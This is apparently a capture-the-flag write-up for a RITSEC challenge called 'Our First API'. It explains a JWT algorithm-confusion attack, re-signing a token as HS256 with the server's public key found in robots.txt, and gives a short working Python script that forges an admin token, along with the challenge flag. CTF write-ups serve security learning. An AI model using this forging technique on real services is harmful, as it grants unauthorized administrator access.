#  Our First API

* ## Observation:
The vulnerability is based on jwt's authentication.
We can change alg in header to HS256 and below is a great article to read about this vulnerability 

https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/?source=post_page-----a94a400c042a----------------------#changing-the-algorithm-from-rs256-to-hs256

After we know that we can forge a token with public key being our secret key,we have to find out the public key in the server and we can find it in robots.txt.

* ## Solution:
```python
#!/usr/bin/python3
import hmac
import base64

def b64en(d):
	return base64.urlsafe_b64encode(d).rstrip(b'=')

data=b64en(b'{"name": "rya","type": "admin","iat": 1574100891}')
header=b64en(b'{"typ":"JWT","alg":"HS256"}')
payload=header+b'.'+data
secret=""
with open('signing.pem','rb') as txt:
	secret=bytes(txt.read())


print(payload.decode()+'.'+b64en(hmac.new(secret,msg=payload,digestmod='sha256').digest()).decode())
```

* ## Flag:
```
RITSEC{JWT_th1s_0ne_d0wn}
```

* ## TODO:
1. study REST API 
2. study algorithm of jwt

